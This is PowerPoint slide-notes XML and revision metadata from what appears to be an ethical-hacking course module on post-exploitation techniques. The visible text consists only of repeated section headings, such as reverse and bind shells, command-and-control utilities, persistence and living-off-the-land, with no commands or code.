      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T20:48:08.863" v="31" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2040982355" sldId="1239"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldMasterChg chg="modSldLayout">
        <pc:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="0" sldId="2147483648"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="modSp">
          <pc:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="0" sldId="2147483652"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="mod">
            <ac:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="0" sldId="2147483652"/>
              <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="modSp">
          <pc:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="0" sldId="2147483653"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="mod">
            <ac:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="0" sldId="2147483653"/>
              <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
            </ac:spMkLst>
          </pc:spChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="modSp">
          <pc:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="0" sldId="2147483654"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="mod">
            <ac:chgData name="Dave Holzinger -X (dholzing - UNICON INC at Cisco)" userId="81433843-a273-4fe1-ba40-f2f44284bc17" providerId="ADAL" clId="{4FF6D70E-79F9-427D-A8AD-0E918D451622}" dt="2023-07-17T22:30:26.133" v="40"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="0" sldId="2147483654"/>
              <ac:spMk id="4"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935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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.1: Overview</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.1: Overview (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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963228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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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551868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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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4213376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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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738349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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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7663117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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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22288072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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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2203758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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">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2203758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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.2: Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.3: Practice - Reverse and Bind Shells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="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631805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Ethical Hacker
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Module 8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Performing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>
</a:t>
            </a:r>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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.4: Command and Control (C2) Utilities</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>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647717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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.4: Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>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3453397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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.1.4: Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>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4537364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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.4: Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.5: Practice - Types of C2 Utilities</a:t>
            </a:r>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33349494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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.6: Scheduled Jobs and Tasks</a:t>
            </a:r>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23000384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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.6: Scheduled Jobs and Tasks (Cont.)</a:t>
            </a:r>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35348488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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.7: Custom Daemons, Processes, and Additional Backdoors</a:t>
            </a:r>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3013051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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.1.8: New Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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37505973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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="B1E8FA"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="B1E8FA"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>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7110399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8: Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8.2.1: Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.2: Post-Exploitation Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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707986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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.2: Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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31688771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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.2: Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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7921172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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.2: Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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31367903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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.2: Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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25589676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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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23751770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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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6723878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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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9881177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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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6884524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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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2413063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245494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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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6286492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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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27368256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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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32094498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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23364930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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21530707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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8724325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Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2: Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8.2.3: Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
